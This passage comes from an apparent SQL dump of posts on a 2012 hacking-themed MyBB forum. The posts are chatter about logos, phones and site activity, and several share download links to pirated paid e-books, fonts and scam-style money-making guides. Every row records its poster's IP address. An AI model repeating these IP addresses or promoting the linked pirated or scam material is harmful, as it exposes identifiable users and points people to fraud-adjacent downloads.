your country code in the target', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '3d7378a9b436dcdbacc28a2922551abc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2129', '453', '0', '19', '[Junk]Instagram Bot 3.2', '0', '82', 'iTzIpod', '1347800106', '[align=center][img]http://img18.imageshack.us/img18/9883/56d94d20c57346a18cceaa1.png[/img] [b]Download:[/b] http://www.mediafire.com/?hgmlkhmp3x9f6k3 [b]Password:[/b] Frez[/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '013596447bc7fb932d7188fecabb8c65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2130', '370', '2120', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '82', 'iTzIpod', '1347800288', '[quote=\'MistaCode\' pid=\'2120\' dateline=\'1347791339\'] [quote=\'R?????zo?\' pid=\'1874\' dateline=\'1347548689\'] [quote=\'t3h jok3r\' pid=\'1761\' dateline=\'1347248932\'] Just saw this thread. Logo is kinda basic, thanks for your input though. I check it and doesn\'t look good on the site but if you can make a better one then I can give that one a try too. [/quote] if you looking for a logo I can try and make something fancy? [/quote] No, im not looking for logo :D im just making an logo ;) [/quote] LOL no no no no. Reloadzor was talking to t3h jok3r. Not you :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f2fa1cdc104ae11e9fb3c039fc1be74', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2131', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '82', 'iTzIpod', '1347800433', 'Incorrect password. :(', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '53f0ca8d060f1a5eacaac9d846201b33', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2132', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1347801078', 'I will get those soon. I got a lot of things going on.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bd753afd11f98b66078dfec0935bc174', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2133', '446', '2058', '28', 'RE: This forum is dead..', '0', '2', 'Apathy', '1347807770', 'I agree. And technically weren\'t you the first active member joker and me second?', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '8b3a9270458036eae97909352325449e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2134', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '172', 'MistaCode', '1347807894', 'Hmm second let me change it ;) [hr] Updated it ;) try now. msg2short', '88.193.83.195', '1489064899', '0', '0', '172', '1347807972', '1', 'a4d54d1cb2598705f79a9ccd023497c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2141', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '172', 'MistaCode', '1347811593', 'I use CS5 Don\'t want to download CS6 yet :D Well CS6 has awesome features, I saw an tutorial somewhere doing Cray to womens bodies ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '95a9429a806a7b7ab36fe3ddc6ca79f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2135', '436', '1988', '7', 'RE: Motivation', '0', '2', 'Apathy', '1347808001', 'The problem is we do not have a \"Pull\" something that attracts people to stay. :3', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'eb8d1348d7bd3d7831e06a85f332b111', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2136', '437', '1995', '3', 'RE: Help keep LH up', '0', '2', 'Apathy', '1347808532', 'I think you could have ads just nit the annoying ones. :3', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '6ab440280cf0f4e699b9cd313c4bfeb8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2137', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '53', 'sirchamp', '1347810760', 'I so far got about 20 times the xbox live code and I got 5 different PDF\'s :) 2 Moneymaking e-books, 1 book about \"how to get rid of bad memories and 2 e-books on how to call the whitehouse!!', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '6c98be73f3fd0fda1fdeb75fc9c354ad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2138', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '53', 'sirchamp', '1347810895', 'It still doesnt fuckin work. -.-', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ebb5dd66d1469179e2ae1e531abf4586', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2139', '454', '0', '35', 'L33THacking Logo attempt 2', '0', '172', 'MistaCode', '1347811140', 'Well now I took time to this one, but lets see how you like it ;) [img]http://i1107.photobucket.com/albums/h400/maxhax195/Attempt-2.png[/img] You can just download it by right clicking it and then Save image as. The background is transparent.', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'e776de09fa01eabbad359d5e5f3dce12', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2140', '452', '2138', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '172', 'MistaCode', '1347811413', '[quote=\'sirchamp\' pid=\'2138\' dateline=\'1347810895\'] It still doesnt fuckin work. -.- [/quote] LOL I was sure that I changed it.... Mediafire fails, ill just damn upload it to Dropbox :) https://dl.dropbox.com/u/61362288/How%20to%20Get%20%20%2420%2B%20Checks%20from%20Hershey.pdf Enjoy ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '680705acf50174f7014fab234be61fea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2142', '454', '2139', '35', 'RE: L33THacking Logo attempt 2', '0', '1', 't3h jok3r', '1347811679', 'Better than the 1st one. I like the 3D idea especially the font, I will five it a try also can you try doing a green on top and black shadow?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd83c13338b450f5eb5e8a32118b0e7f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2143', '431', '2118', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '1', 't3h jok3r', '1347811790', '[quote=\'R?????zo?\' pid=\'2118\' dateline=\'1347778640\'] [quote=\'t3h jok3r\' pid=\'2103\' dateline=\'1347745224\'] [quote=\'iTzIpod\' pid=\'2102\' dateline=\'1347744004\'] t3h jok3r, why not just look for an icon. And then post the icon here. So he can use the same text + the icon of your liking. OT: Thanks Reloadzor for making me this animated signature. Thanks for changing the font too. <3 Vouch for legit and awesome and fast service <3 [/quote] Yeah, but if I pick a icon and that doesn\'t turn out to look good then his efforts might go into waste. [/quote] if you liked the font I will post like 3-5 versions with different icons when I got the time later. you will pick the best :) [/quote] That would be great, I like the font.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09de8d2f2c2703caaf2cc9bcfd847efa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2144', '454', '2142', '35', 'RE: L33THacking Logo attempt 2', '0', '172', 'MistaCode', '1347812110', '[quote=\'t3h jok3r\' pid=\'2142\' dateline=\'1347811679\'] Better than the 1st one. I like the 3D idea especially the font, I will five it a try also can you try doing a green on top and black shadow? [/quote] It has black shadow but yeah Green top: [img]https://www.dropbox.com/s/ok8bzkrx983wl0w/Edit.png[/img] If image doesn\'t work: https://www.dropbox.com/s/ok8bzkrx983wl0w/Edit.png I tried few effects, lets see if you like it ;)', '88.193.83.195', '1489064899', '0', '0', '172', '1347812136', '1', '45c891c50bf5df9156b6e0bd8c299242', '0', '1347812136'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2145', '437', '2136', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347812518', '[quote=\'Apathy\' pid=\'2136\' dateline=\'1347808532\'] I think you could have ads just nit the annoying ones. :3 [/quote] Well I thought of something. I can\'t and won\'t keep ads but I will keep paid header ads. PM me if you want to know why I don\'t want company ads', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd6616de9c8b5da6ace2808c68ed67dd8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2146', '437', '2091', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347812606', '[quote=\'iTzIpod\' pid=\'2091\' dateline=\'1347741361\'] [quote=\'t3h jok3r\' pid=\'2090\' dateline=\'1347737042\'] [quote=\'iTzIpod\' pid=\'2046\' dateline=\'1347711336\'] [quote=\'t3h jok3r\' pid=\'2035\' dateline=\'1347683967\'] [quote=\'iTzIpod\' pid=\'2020\' dateline=\'1347679116\'] As long as it\'s an adf.ly link and someone clicks on it, you still get money. :p [/quote] I have no idea what you are talking about. [/quote] I meant. l33thacking.net was still an Adf.ly link. And so if someone clicks on it, you can still get money. O_o But you changed it to L33thacking.net now so it doesn\'t matter. [/quote] Oh OK, it\'s better to have it redirect to the new LH site because then we can even get more members. [/quote] Do you know an estimate on when that\'s gonna happen? [/quote] Had to double post because I\'m ony iPod. Around 2-4 new members everyday if my spreading succeeds.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c24f1b357921fb07b8b0b333543659f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2147', '455', '0', '29', 'CPA Twister 1.3 by sonex [FREE]', '0', '172', 'MistaCode', '1347812651', 'Hey guys, as the owner (sonex) is angry that my paypal account is closed and I got the money back, as Paypal thinks I\'m using fraud CC or doing Illegal money. So they will soon contact me though, but I wanted to share this as my Accounts are getting closed on HF/UB... Download: https://dl.dropbox.com/u/61362288/CPA%20Twister%201.3%20by%20sonex.rar Enjoy & Don\'t Forget to say thanks!', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '23499af900e8a5b7eb4d74d628752d51', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2148', '456', '0', '29', 'Galaxian PPD Method v2 [Free]', '0', '172', 'MistaCode', '1347812738', 'Price: 14.99$ Our Price: 0.00$ Download : https://dl.dropbox.com/u/61362288/Galaxian%20PPD%20Method%20v2.rar Enjoy & don\'t Forget to say thanks!', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'f1289e43baeab142d363f32f983697f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2149', '457', '0', '29', 'Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '172', 'MistaCode', '1347812885', 'Well they don\'t share this anymore anywhere, so I decided to share it here ;) Download : https://dl.dropbox.com/u/61362288/Get%20free%20Alienware%20Laptops%20%5BSecret%20Loophole%20of%20Dell%20Revealed%5D%28Limited%20Edition%29.pdf Don\'t Forget to say thanks ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '0f99ba05dff93842711b3cfec87a1f56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2150', '458', '0', '29', 'How to get 26 months free of xbox live membership', '0', '172', 'MistaCode', '1347813005', 'Price: I think about 5$ Our Price: 0.00$ Thanks to me for buying this ;) Download : https://dl.dropbox.com/u/61362288/How%2Bto%2Bget%2B26%2Bmonths%2Bfree%2Bof%2Bxbox%2Blive%2Bmembership.pdf Enjoy !(:', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'e646cf805d34b561023ea4ccbf7f371f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2151', '459', '0', '29', 'Affiliate Marketing [Price: 8$]', '0', '172', 'MistaCode', '1347813077', 'Price: 8$ Our Price: 0.00$ Bought by me & shared by me ;) Download : https://dl.dropbox.com/u/61362288/Affiliate%20Marketing%20by%20sonex.rar Enjoy !(:', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '2d29fb1ad53239e3c58340c9608b2e21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2152', '446', '2058', '28', 'RE: This forum is dead..', '0', '172', 'MistaCode', '1347813129', 'Well im trying :D Look the Advanced Methods section, I posted few HQ e-books !', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '112a978f666eb19ed5dcd37507fd184b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2153', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '62', 'R?????zo?', '1347814921', 'link is broken, please fix it.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e8f46ac65741c5b919535842128b28ce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2154', '457', '2153', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '172', 'MistaCode', '1347815654', '[quote=\'R?????zo?\' pid=\'2153\' dateline=\'1347814921\'] link is broken, please fix it. [/quote] So weird... All my links are dead ugh... https://dl.dropbox.com/u/61362288/Get%20free%20Alienware%20Laptops%20%5BSecret%20Loophole%20of%20Dell%20Revealed%5D%28Limited%20Edition%29.pdf Not it works ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'f36ef33eb2751597429a29c86a0b9d90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2155', '443', '2101', '42', 'RE: Apple Announces the iPhone 5', '0', '172', 'MistaCode', '1347816171', '[quote=\'iTzIpod\' pid=\'2101\' dateline=\'1347743858\'] I know right? That\'s really expensive... [/quote] 200$ for iPhone? That\'s called Cheap for iPhone. As iPhone 4S was 500$, and that\'s called expensive.', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '5e6e0112fca47d95e39d3d44f66e55a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2156', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347816205', 'Hope you like it: [URL=http://imgur.com/0VS9Y][IMG]http://i.imgur.com/0VS9Y.png[/IMG][/URL] [URL=http://imgur.com/gTAZz][IMG]http://i.imgur.com/gTAZz.png[/IMG][/URL] [URL=http://imgur.com/a14ON][IMG]http://i.imgur.com/a14ON.png[/IMG][/URL] [URL=http://imgur.com/NoerW][IMG]http://i.imgur.com/NoerW.png[/IMG][/URL] [URL=http://imgur.com/Y8ZlJ][IMG]http://i.imgur.com/Y8ZlJ.png[/IMG][/URL] [URL=http://imgur.com/8ojq4][IMG]http://i.imgur.com/8ojq4.png[/IMG][/URL]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8689f048cda63a72485d988ff63fe72e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2157', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '53', 'sirchamp', '1347816744', 'LOL I cant open the file. Wierd', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '3435d8c125acf4b1d4ad4a620d9b0182', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2158', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '62', 'R?????zo?', '1347817103', 'i\'ve came up with this :P [img]http://i.imgur.com/HFb4o.gif[/img]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '888cc1cac695a5c04760c813d4146e0f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2159', '460', '0', '34', 'R?????zo?\'s font pack, 1500+ [FREE]', '0', '62', 'R?????zo?', '1347817644', 'Heres the fonts I use, most of them are paid fonts and I\'m giving you for free. Proof: [img]http://i.imgur.com/8iZOR.png[/img] Download link: http://www.mediafire.com/?m3dmo48r2aa142s', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '73a304f7c6a46f83be2c89054c08758a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2160', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '62', 'R?????zo?', '1347817749', 'its still broken for me :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '11a4da469b6e0734b79b3ed26c3708d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2161', '436', '2135', '7', 'RE: Motivation', '0', '82', 'iTzIpod', '1347824573', '[quote=\'Apathy\' pid=\'2135\' dateline=\'1347808001\'] The problem is we do not have a \"Pull\" something that attracts people to stay. :3 [/quote] What is this \"pull\" you\'re talking about? I don\'t get what you mean..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1561bf292082e2eaa33e96f1da3ced24', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2162', '289', '2137', '15', 'RE: UploadNSell Exploit Program', '0', '82', 'iTzIpod', '1347824636', '[quote=\'sirchamp\' pid=\'2137\' dateline=\'1347810760\'] I so far got about 20 times the xbox live code and I got 5 different PDF\'s :) 2 Moneymaking e-books, 1 book about \"how to get rid of bad memories and 2 e-books on how to call the whitehouse!! [/quote] Want to share them to L33t Hacking? Like release it in the Upgraded Section or something? :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a99427df1a6feb645079f8e04245d31b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2163', '454', '2139', '35', 'RE: L33THacking Logo attempt 2', '0', '82', 'iTzIpod', '1347824745', 'Looks way better than the first one. 8/10.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9dce2024627903e783d1326a4a156be7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2164', '446', '2152', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1347825009', '[quote=\'MistaCode\' pid=\'2152\' dateline=\'1347813129\'] Well im trying :D Look the Advanced Methods section, I posted few HQ e-books ! [/quote] I know. I saw them. Good job.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'de598bae4384e6e54133098ab543655d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2165', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '82', 'iTzIpod', '1347825140', 'The iPhone 5 64 GB is $399 + tax. + That\'s quite expensive in my opinion.. iPhone 4S was expensive too. I didn\'t say it wasn\'t.', '24.212.197.164', '416597412', '1', '0', '82', '1347825248', '1', '6451d2db97d8e52747b60d2905464c8b', '0', '1347825248'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2166', '431', '2156', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '82', 'iTzIpod', '1347825208', '[quote=\'R?????zo?\' pid=\'2156\' dateline=\'1347816205\'] Hope you like it: [URL=http://imgur.com/0VS9Y][IMG]http://i.imgur.com/0VS9Y.png[/IMG][/URL] [URL=http://imgur.com/gTAZz][IMG]http://i.imgur.com/gTAZz.png[/IMG][/URL] [URL=http://imgur.com/a14ON][IMG]http://i.imgur.com/a14ON.png[/IMG][/URL] [URL=http://imgur.com/NoerW][IMG]http://i.imgur.com/NoerW.png[/IMG][/URL] [URL=http://imgur.com/Y8ZlJ][IMG]http://i.imgur.com/Y8ZlJ.png[/IMG][/URL] [URL=http://imgur.com/8ojq4][IMG]http://i.imgur.com/8ojq4.png[/IMG][/URL] [/quote] LOL Gotta love the first one. Asian guy <3 Or he looks asian..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '97e373d213efb5caa8b774046a370796', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2167', '345', '2158', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347825330', '[quote=\'R?????zo?\' pid=\'2158\' dateline=\'1347817103\'] i\'ve came up with this :P [img]http://i.imgur.com/HFb4o.gif[/img] [/quote] You gotta teach me how to do that... It looks so professional... :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '34a1e64e029a7115be5b50a3e2aa5b34', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2168', '460', '2159', '34', 'RE: R?????zo?\'s font pack, 1500+ [FREE]', '0', '82', 'iTzIpod', '1347825403', '[quote=\'R?????zo?\' pid=\'2159\' dateline=\'1347817644\'] Heres the fonts I use, most of them are paid fonts and I\'m giving you for free. Proof: [img]http://i.imgur.com/8iZOR.png[/img] Download link: http://www.mediafire.com/?m3dmo48r2aa142s [/quote] Thank you so much <3 I really needed these.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f3a331054291c43a656d6b3b3264e83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2169', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '82', 'iTzIpod', '1347825465', 'Thanks. Password is thanks for the Dropbox Link. Thanks 